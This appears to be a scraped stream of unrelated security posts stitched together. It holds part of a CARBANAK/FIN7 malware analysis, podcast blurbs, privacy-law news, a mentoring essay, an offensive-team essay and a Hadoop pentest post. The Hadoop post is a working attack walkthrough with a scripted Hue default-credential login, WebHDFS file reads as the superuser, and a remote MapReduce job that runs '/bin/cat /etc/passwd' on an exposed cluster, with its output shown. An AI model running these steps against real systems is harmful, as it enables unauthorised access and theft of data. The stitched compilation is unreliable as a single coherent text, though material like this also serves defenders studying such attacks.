What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain blizko.net in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

  • Aug (compiled 7/30/15)
  • dec (compiled 12/8/14)
  • julyc (compiled 7/2/16)
  • jun (compiled 5/9/15)
  • june (compiled 5/25/14)
  • june (compiled 6/7/14)
  • junevnc (compiled 6/20/14)
  • juspam (compiled 7/13/14)
  • juupd (compiled 7/13/14)
  • may (compiled 5/20/14)
  • may (compiled 5/19/15)
  • ndjun (compiled 6/7/16)
  • SeP (compiled 9/12/14)
  • spamaug (compiled 8/1/14)
  • spaug (compiled 8/1/14)

Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64-bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date, when they will become active.

History

The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.

FIN7

In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.

DRIFTPIN

DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016. Also, in late 2015, ESET reported on CARBANAK-associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.

Conclusion

The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk, as discussed above; they are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

Startup Security Weekly #44 – Selling Ice to an Eskimo

Tarun Desikan of Banyan joins us alongside guest host Matt Alderman. In the news, negotiation mistakes that are hurting your deals, hiring re-founders, updates from Hexadite, Amazon, Sqrrl, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode44 Visit https://www.securityweekly.com for all the latest episodes!

Startup Security Weekly #43 – Never Stop Believing

The six secrets to starting smart, a startup’s guide to protecting trade secrets, knowing what your customers value, and more articles for discussion. In the news, updates from Netskope, Yubikey, CybelAngel, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode43 Visit https://www.securityweekly.com for all the latest episodes!

China Releases Draft Guidelines on Cross-Border Data Transfers Pursuant to the Cybersecurity Law

On May 27, 2017, the National Information Security Standardization Technical Committee of China published draft guidelines on cross-border transfers pursuant to the new Cybersecurity Law, entitled Information Security Technology – Guidelines for Data Cross-Border Transfer Security Assessment (the “Draft Guidelines”). The earlier draft, Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft Measures”), requires network operators to conduct “security assessments” when they propose to transfer personal information and “important information” to places outside of China. These “security assessments” are essentially audits of the cybersecurity circumstances surrounding the proposed transfer that are intended to produce an assessment of the risk involved. If the assessment indicates that the risk is too high, the transfer must be terminated.

The Draft Guidelines, once finalized, are intended to establish norms for working requirements, methodology, content and the determination of conclusions for these “security assessments.” They recommend particular content for consideration during “security assessments,” such as the volume of information to be transferred, the political and legal environment in the place where the data recipient is located, and the security safeguard capabilities of both the transferor and the data recipient. At this time, the following observations can be made:

  • Very generally speaking, the Draft Measures appear to take a risk-based approach, meaning that an assessment of the overall risks associated with a cross-border transfer, and the likely outcomes thereof, rather than a formalistic “check the box” compliance approach, should be used to determine whether the transfer should proceed.
  • The Draft Guidelines appear intended, once finalized, to be a voluntary rather than compulsory document.
  • The “security assessments” would focus on two overall inquiries: (1) the legality and appropriateness of the proposed cross-border transfer, and (2) the controllability of the risks involved.
  • In addition to personal information, the Draft Measures would also impose restrictions on the cross-border transfer of “important information.” The Draft Measures define this term broadly as “information which is very closely related to national security, economic development and the societal and public interests.” The Draft Guidelines provide some specific possible examples of what might constitute “important information.”
  • The Draft Guidelines would introduce into the Cybersecurity Law’s implementation framework the concept of “sensitive personal information,” as well as the possibility of desensitizing this information using processing that removes or reduces the sensitive elements in the data.

The Draft Guidelines’ content and approach may change by the time they are finalized. The Draft Guidelines are open to comment from the general public until June 26, 2017.

Enterprise Security Weekly #48 – Making Everybody Mad

Paul and John discuss building an internal penetration testing team. In the news, automating all the things, Juniper Networks opens a software-defined security ecosystem, millions of devices are running out-of-date systems, Duo and McAfee join forces, and more in this episode of Enterprise Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ES_Episode48 Visit https://www.securityweekly.com for all the latest episodes!

Federal Court Imposes Record Fine on TV Provider for Do Not Call Violations

On June 5, 2017, an Illinois federal court ordered satellite television provider Dish Network LLC (“Dish”) to pay a record $280 million in civil penalties for violations of the FTC’s Telemarketing Sales Rule (“TSR”), the Telephone Consumer Protection Act (“TCPA”) and state law. In its complaint, the FTC alleged that Dish initiated, or caused a telemarketer to initiate, outbound telephone calls to phone numbers listed on the Do Not Call Registry, in violation of the TSR. The complaint further alleged that Dish violated the TSR’s prohibition on abandoned calls and assisted and facilitated telemarketers when it knew or consciously avoided knowing that telemarketers were breaking the law.

The court held, in a 475-page opinion, that Dish committed over 66 million TSR violations. Judge Sue Myerscough stated that Dish “created a situation in which unscrupulous sales persons used illegal practices to sell Dish Network programming any way they could.”

$168 million of the penalty was awarded to the federal government, the largest civil penalty obtained to date in a Do Not Call case. The remaining amount was awarded to the states of California, Illinois, North Carolina and Ohio. The court also ordered injunctive relief, requiring Dish to:

  • demonstrate that it and its primary retailers fully comply with the TSR’s Safe Harbor Provisions;
  • hire a telemarketing expert to ensure compliance; and
  • submit to bi-annual compliance verification by the government.

In a statement, Dish indicated its plans to appeal the judgment. Acting FTC Chairman Maureen Ohlhausen pointed to the court’s decision as evidence that “companies will pay a hefty price for violating consumers’ privacy with unwanted calls.”

European Commission Pushes for Greater EU Role in Cybersecurity

On June 7, 2017, the European Commission published a paper signalling the EU’s intention to increase its role in directing cybersecurity policy and responses across its member states. The increasing threat posed by cyber attacks is highlighted in the EU Commission’s Reflection Paper on the Future of European Defence, which builds its case for closer union in respect of defense efforts.

In the paper, the EU Commission cites how increasingly accessible technology has enabled the rapid rise of security threats, including cyber threats. It sets out three standards of cooperation:

  • Security and Defense Cooperation, under which the 27 post-Brexit EU Member States would simply cooperate on security and defense more frequently than in the past;
  • Shared Security and Defense, under which the 27 EU Member States would begin closer financial and operational integration with respect to security and defense measures; and
  • Common Defense and Security, under which solidarity and mutual assistance between EU Member States would become the default position on security and defense issues, and involving a common EU defense policy.

In common with the tone of the paper, the EU Commission suggests that common defense and security arrangements would allow the EU to coordinate responses to cyber attacks and facilitate greater information sharing, technological cooperation and joint doctrines on cyber threats.

The EU Commission also published a Communication that highlights the importance of launching a European Defense Fund without undue delay. The fund, aimed at countering the lack of defense cooperation between EU Member States, was backed by the Council of the European Union in 2016 and will include funding for cybersecurity projects.

Mentoring: On meeting your **Heroes**

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's line that being even the most popular infosec person is like being a famous bowler. With rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical, and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person," and the guy proceeded to be a drunk dbag to him. It ended up taking quite a bit of wind out of his sails to have someone he kinda looked up to bag on his current career state and the talks he was working on.

When I first joined the army, I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do-no-wrong individual. Shit, if someone has all this shit on their chest they must be badass, right??!!
For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well, the Army does a great job of stacking the deck so that the people you initially meet are pretty decent individuals. I think most people think highly of their drill sergeants their entire life. So the first few people I met that had these badges reaffirmed this belief. Then I got out and met a few more and was completely let down by the quality of these people. When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career for your entire career. So maybe at some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at whatever the badge says they are good at, or even a good person. It means that at one point in time they met a set of criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that, 10 years later, are still riding the vapor trails of some awesome shit they did but haven't done anything else relevant since. Some people have giant egos and only care about you if you are currently in the process of kissing their ass. To be fair, if people ARE kissing your ass it's hard not to get an ego, but you have to work hard to check that shit at the door.

Remember we are famous bowlers?


What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

When you are someone else's hero, always remember how you felt when your hero dissed you.


-CG

Hack Naked News #128 – June 6, 2017

Exploiting Windows 10, mimicking Twitter users, vulnerabilities in new cars, security issues surrounding virtual personal assistants, and more. Jason Wood of Paladin Security joins us to discuss sniffing out spy tools with ridesharing cars on this episode of Hack Naked News!

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode128 Visit http://www.securityweekly.com for all the latest episodes!

The Offensive Cyber Security Supply Chain

During the past few weeks some people asked me how to build a "cyber security offensive team". Since this is a recurring question, I decided to write a little bit about my point of view and my past experiences on this topic without getting into details (no procedures, methodologies, communication artifacts or skill sets will be provided).

Years ago, a well skilled and malicious actor (let me call him a hacker, even if I am perfectly aware this is not the right word) could launch a single, sophisticated attack able to hit significant infrastructure and cause large and glaring damage. Nowadays this scenario is (fortunately) more unlikely, since cyber defense technology has made huge strides and public/private organizations have grouped cyber security experts into blue teams. The most doubtful of my readers are probably thinking that offensive technology has made huge strides as well, and I perfectly agree with you! However, you will probably agree with me that attack complexity has risen a lot: years ago, to perform a successful cyber attack you didn't need intermediaries such as anonymizers, malware evasion techniques, fast flux, DGA and -- more generally speaking -- all the techniques required to trick (or elude) blue teams, since no blue teams (or very few of them) existed. My point here is pretty clear: while years ago a single hacker was enough to attack a structured system (for example ICS, government networks or corporate networks), nowadays if you really want to successfully create a cyber security "army" you need a structured group of people. Talented people are very important, but not as much as they were in past years. In my personal view, talented people should move from technical operations to organizational operations. I'll try to explain my point of view better as you read on.

The question now gets pretty simple: "What does that group do? And how should it be organized?"
A team is usually a group of people that works together in order to reach a common target. The target should be clear to every team member (if you want a performing team), and every team member should share the same team beliefs in order to get the tasks done and quickly reach the target.

The group of people making up an "offensive cyber security group" is not a "team" (as defined above) but is closer to a software supply chain, where everybody has specific tasks and different targets. Let me put it this way: if your task is to build a PDF parsing library, you don't need to know where your library will be used, since your target is to build a generic and reusable library. Someone could use your library for a nice "automatic invoice maker" or for "injecting malicious JavaScript into a PDF", and for you (the PDF library writer) nothing should change. For this reason I would not call this group of people an Offensive Cyber Security Team but rather an Offensive Cyber Security Supply Chain (OCSSC). Every step of the supply chain is carried out by a specific team.
  
As with every supply chain, the OCSSC needs common rules, methodologies and best practices to be shared among its stages, such as:
- Communication Artifacts. What are the artifacts to be exchanged between the supply chain teams?
- Procedures. What are the global procedures that shall be followed between teams? What procedures are needed intra-team?
- Tools. What are the most useful tools to be used intra-team? And what tools should be used between teams?
- Skill Sets. What skill sets are needed for each team?
- Recovery Procedures. What are the special recovery procedures within each team?

I am not going into those questions, since my goal is not to help my readers build an OCSSC but, on the contrary, to alert blue teams that offensive groups are getting more structured and purposeful day by day. However, I will give a broad view of how an OCSSC is likely to be organized in 2017.

The following image shows five stages representing five different teams, which collaborate through well-known artifacts.

Offensive Cyber Security Supply Chain


I call the first team the Hunters. This team should be able to find new exploitable vulnerabilities in common software. It needs strong contacts within the hacking community, in order to eventually acquire 0-days from third parties, and up-to-date, sharp fuzzers. This team needs a private cloud with intensive computational resources for fuzzing several pieces of software in parallel. It gets feedback on what to fuzz from the community and from the DEV-Stage team, which should indicate to the Hunters which software is most interesting to investigate for vulnerabilities. In real life, this team could be the one that finds vulnerabilities like, for example, the one behind the infamous MS17-010.

I call the second team DEV-Stage. This team is mainly made up of developers. The aim of DEV-Stage is to develop droppers starting from exploits: it takes exploit artifacts from the Hunters and arms the developed exploit kits and/or weaponizes the developed worm. The DEV-Stage team should be able to answer the question: "How do I technically infect victims?" It gets two artifacts as input: one from the Payload team suggesting what kind of dropping method they need, and the other from the Intruders, who will suggest whether to focus more on "web", "physical", "dedicated devices" and so on. In real life, this team could be the one that builds exploit kits and/or dropping technology such as, for example, EternalBlue.

I call the third team DEV-Payload. This team is mainly made up of developers and software testers. The aim of DEV-Payload is to build the dropped payload. This team needs to take care of communication channels, system persistence, evasion techniques and extensibility. It gets artifacts from the DEV-Stage team in order to perform deep and well structured tests, and feedback from the Intruders, who suggest which functionalities should be developed in order to reach the Intruders' target. In real life, this team is the one that develops malware (or RATs) such as, for example, WannaCrypt0r or DoublePulsar.

I call the fourth team the Intruders. The Intruders are the ones who perform the first intrusion actions. This team gets as input artifacts such as: (1) the developed DEV-Stage component (for example, the exploit kit to be implanted) and (2) the developed payload (for example, the malware to be dropped on the target system). It also gets feedback from the Socials, with suggestions on which websites and/or infrastructure to attack. The Intruders are not developers but mainly penetration testers, people who gain access to external resources (such as public websites or public infrastructure) and compromise them by injecting the DEV-Stage artifacts. The Intruders might need to build new infrastructure, such as new websites or new public resources, in order to fully arm a target system. In real life, this team could be the one that infects public websites with exploit kits such as, for example, Angler, Neutrino or Terror EK.

I call the fifth team the Socials. This team is mainly made up of communicators and marketing people who are able to perform the following actions: on one side, getting and giving light artifacts (A2l) from/to the hacking community in order to maintain a presence in it; on the other side, attracting targets to the prepared infrastructure (built by the Intruders). They give feedback to the Intruders in order to steer their operations toward what is really useful against the attacked target. In real life, this group is the closest to human intelligence.

Every team in the Offensive Cyber Security Supply Chain needs to work together, but without knowing the other teams' targets. Every team is charged with specific goals. Communication artifacts, sharing tools and operational tools play fundamental roles in getting things done. A talented supervisor is needed in order to keep communication between teams smooth and to organize the overall supply chain. This is one of the most important roles, and it must belong to a great leader able to deal with super talented, technical people. The supervisor should know methodologies, processes and best practices very well, and should have a clear view of the overall scenario. He should have an intensive technical and hacking background and should never stop learning from other members. Great communication skills are required in order to develop leadership.

My post was about the Offensive Cyber Security Supply Chain. The goal of this quick blog post was to help blue teams and defense agencies by increasing their awareness of how an OCSSC is likely to be organized in 2017. We are currently experiencing a big shift in offensive operations, from single talented individuals to well structured and organized supply chains; we need to strengthen and structure our defenses as well.

CIPL Issues Recommendations for Implementing Transparency, Consent and Legitimate Interest under the GDPR

Recently, the Centre for Information Policy Leadership (“CIPL”) at Hunton & Williams LLP issued a white paper on Recommendations for Implementing Transparency, Consent and Legitimate Interest under the GDPR (the “White Paper”). The White Paper sets forth guidance and recommendations on the key concepts of transparency, consent and legitimate interest under the EU General Data Protection Regulation (“GDPR”).

Transparency

One of the main objectives of the GDPR is the empowerment of individuals, and transparency is a prerequisite to meeting this objective. However, there is a growing gap between legal transparency, delivered through traditional and lengthy privacy policies and notices, and user-centric transparency. CIPL recommends that transparency under the GDPR be user-centric. Therefore, when implementing transparency, the focus should be on informing users by providing meaningful information in concise and intelligible formats.

Additional recommendations in the White Paper include:

  • The GDPR links transparency to fair processing and therefore ensuring effective transparency is critical for establishing and maintaining trust and digital confidence among data subjects.
  • The concept of transparency under the GDPR is broader than privacy notices and should include all mechanisms used to communicate data uses to an individual.
  • Transparency has a role in setting the reasonable expectations of individuals regarding the use of their data and should be an intrinsic part of any consent.
  • Transparency is an essential element of organizational accountability and data protection authorities should incentivize diverse user-centric transparency and showcase best practices.
  • Transparency must be embedded as much as possible within the relevant product, service, process or technology to avoid creating unnecessary burdens on individuals.
  • Algorithmic transparency should be focused on the broad logic involved rather than attempting full transparency to the individual through explaining the intricacies of the algorithm itself.
  • Transparency cannot be absolute and may be limited by trade secrets, commercial and competition considerations as well as by rights of others and the public interest.

Consent

Consent is on equal footing with other processing grounds under the GDPR and should not be overused or used inappropriately. Different implementations around the age of consent for children are causing concern, as this could undermine the harmonization objective of the GDPR.

Additional recommendations include:

  • Consent should be used as a legal ground for processing in situations where it is possible to provide clear and understandable information at the right time and individuals have a genuine choice concerning the use of their personal data.
  • Overreliance on consent creates consent fatigue for individuals. Use of consent as a grounds for processing must be in line with the requirements of the GDPR and adapted to the modern information age.
  • Explicit consent is only required for certain processing.
  • Pre-GDPR consents should continue to be valid if obtained in compliance with the EU Directive and national law, subject to certain exceptions addressed in the White Paper. Organizations should not have to re-paper existing consent until there is a material change in processing and its purposes.
  • EU Member States should take a harmonized approach regarding the age of consent for children. The age should be 13.
  • There are concerns about the predominance of consent in the ePrivacy Rules. The EU legislator should introduce the concept of legitimate interest into the ePrivacy Regulation.

Legitimate Interest

In situations where consent is deemed impractical or ineffective, other grounds for processing may be used in its place, including the concept of legitimate interest. Legitimate interest may be the most accountable basis for data processing in many contexts, as it requires an assessment and balancing of the risks and benefits of processing for organizations, individuals and society. It also requires the implementation of appropriate mitigations to reduce or eliminate any unreasonable risks.

Additional recommendations include:

  • Legitimate interest is an essential basis for data processing and ensures the GDPR remains future-proof and technology neutral.
  • Legitimate interest places the burden of protecting individuals on the organization, which is in the best position to undertake a risk/benefits analysis and to devise appropriate mitigations.
  • A general non-exhaustive “database” of legitimate interest processing cases may facilitate proper implementation of this requirement in the future.
  • Legitimate interest facilitates low-impact data processing.
  • Legitimate interest does not provide a carte blanche for processing.
  • The reasonable expectations of the individual are a relevant factor in the legitimate interest balancing test. However, even if proposed processing is not within the reasonable expectations of the individual, the balancing test may still validate the processing, such as where the public interest or other factors may support an unexpected use. Further, reasonable expectations may change over time and the balancing test must take these changes into account.

The White Paper was developed in the context of CIPL’s ongoing GDPR Implementation Project, a multi-year initiative involving research, workshops, webinars and white papers, supported by over 80 private sector organizations, with active engagement and participation by many EU-based data protection and governmental authorities, academics and other stakeholders.

EU Commission Issues Questionnaire in Preparation for Annual Review of Privacy Shield

On June 2, 2017, in preparation for the first annual review of the EU-U.S. Privacy Shield (“Privacy Shield”) framework, the European Commission sent questionnaires to trade associations and other groups, including the Centre for Information Policy Leadership at Hunton & Williams LLP, to seek information from their Privacy Shield-certified members on the experiences of such organizations during the first year of the Privacy Shield. The EU Commission intends to use the questionnaire responses to inform the annual review of the function, implementation, supervision and enforcement of the Privacy Shield.

Among other focus areas, the questionnaire seeks information on how Privacy Shield-certified entities have:

  • implemented policies, procedures and other measures to meet their Privacy Shield obligations and each of the Privacy Shield Principles;
  • modified their business and contractual arrangements with third parties to ensure that the third parties appropriately protect the personal information they receive from Privacy Shield-certified organizations;
  • addressed complaints (if any) from individuals whose personal information has been transferred pursuant to the Privacy Shield; and
  • addressed the requirement to select an independent dispute resolution mechanism.

The questionnaire also asks for Privacy Shield-certified organizations’ views on:

  • the issuance of transparency reports, pursuant to the USA Freedom Act, regarding U.S. authorities’ national security-related access requests;
  • the extent to which personal information transferred pursuant to the Privacy Shield is used for automated decision-making in connection with decisions that might significantly affect individuals’ rights or obligations;
  • developments in U.S. law that might affect the EU Commission’s assessment of the Privacy Shield; and
  • challenges that such organizations have encountered in meeting the Privacy Shield’s requirements.

Responses to the questionnaire are due to the EU Commission by July 5, 2017.

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."
from: http://hadoop.apache.org/

If you've ever heard of MapReduce...you've heard of Hadoop.

NFI what I'm talking about? Here is a 3-minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points, from Kaluzny's ZeroNights talk:



Hue

Common default credentials: admin/admin and cloudera/cloudera



Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, you get full HDFS access, the ability to run queries, etc.
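
A minimal way to test those defaults from the command line, assuming Hue is on its usual port 8888; the login endpoint, cookie and field names below are based on Hue's standard Django login form and are assumptions that may differ between versions:

# fetch the login page to pick up a CSRF token (Hue is Django-based)
curl -s -c cookies.txt -o /dev/null http://target:8888/accounts/login/
CSRF=$(awk '/csrftoken/ {print $7}' cookies.txt)

# try a default pair; a 302 redirect (rather than the login form again) suggests success
curl -s -b cookies.txt -o /dev/null -w "%{http_code}\n" \
  -e http://target:8888/accounts/login/ \
  -d "username=admin&password=admin&csrfmiddlewaretoken=$CSRF" \
  http://target:8888/accounts/login/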


HDFS WebUI
HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).
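
If you would rather script it, the same overview data is exposed as JSON through Hadoop's standard JMX servlet on the NameNode; a quick sketch (replace namenode with the target host):

# NameNode overview: version, capacity, live and dead DataNodes, etc.
curl -s "http://namenode:50070/jmx?qry=Hadoop:service=NameNode,name=NameNodeInfo"

# filesystem state, roughly what 'hadoop dfsadmin -report' summarizes
curl -s "http://namenode:50070/jmx?qry=Hadoop:service=NameNode,name=FSNamesystemState"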





From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.
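
If WebHDFS is enabled on the cluster (dfs.webhdfs.enabled, commonly left on), the same browsing can be scripted over the REST API: the NameNode answers metadata calls on 50070 and redirects actual reads to a DataNode on 50075. A rough sketch, where /path/to/file is a placeholder and the user.name parameter is only honored on clusters running without Kerberos:

# list the HDFS root as the 'hdfs' superuser (simple auth only)
curl -s "http://namenode:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"

# read a file; -L follows the 307 redirect to a DataNode on port 50075
curl -s -L "http://namenode:50070/webhdfs/v1/path/to/file?op=OPEN&user.name=hdfs"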





Update: The Hadoop Attack Library is worth checking out:
https://github.com/wavestone-cdt/hadoop-attack-library

The most up-to-date presentation on the Hadoop Attack Library: https://www.slideshare.net/phdays/hadoop-76515903

There is a section covering RCE (https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands).

You'll need information exposed at http://ip:50070/conf (the NameNode's configuration dump).
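
For example, a couple of quick ways to pull what you need out of that configuration dump (target is a placeholder; adjust the grep depending on how the XML is formatted):

# dump the target's running configuration as XML
curl -s http://target:50070/conf -o target-conf.xml

# look for the filesystem and ResourceManager endpoints the client config needs
grep -E -A 2 "fs\.defaultFS|yarn\.resourcemanager" target-conf.xml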





TL;DR: find the open Hadoop ports and run a MapReduce job against the remote Hadoop server (see the client-side configuration sketch after the list below).
You need to be able to reach the following Hadoop services over the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010
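
A sketch of how to point a local Hadoop client at the remote cluster using generic -D options (hostnames, ports and the streaming jar path below are placeholders; the same properties can instead be set in core-site.xml and yarn-site.xml on your own machine, and the exact set needed can vary by distribution):

# -input must reference a file that already exists on the target's HDFS
hadoop jar hadoop-streaming-2.7.3.jar \
  -D fs.defaultFS=hdfs://target:8020 \
  -D mapreduce.framework.name=yarn \
  -D yarn.resourcemanager.address=target:8032 \
  -input /tmp/a.txt -output probe_out \
  -mapper "id" -reducer NONE

If the job is accepted and completes, whatever the mapper prints ends up in the output directory on the target's HDFS, which is exactly what the run below demonstrates with /bin/cat /etc/passwd.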


Let's see it in action:


lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash
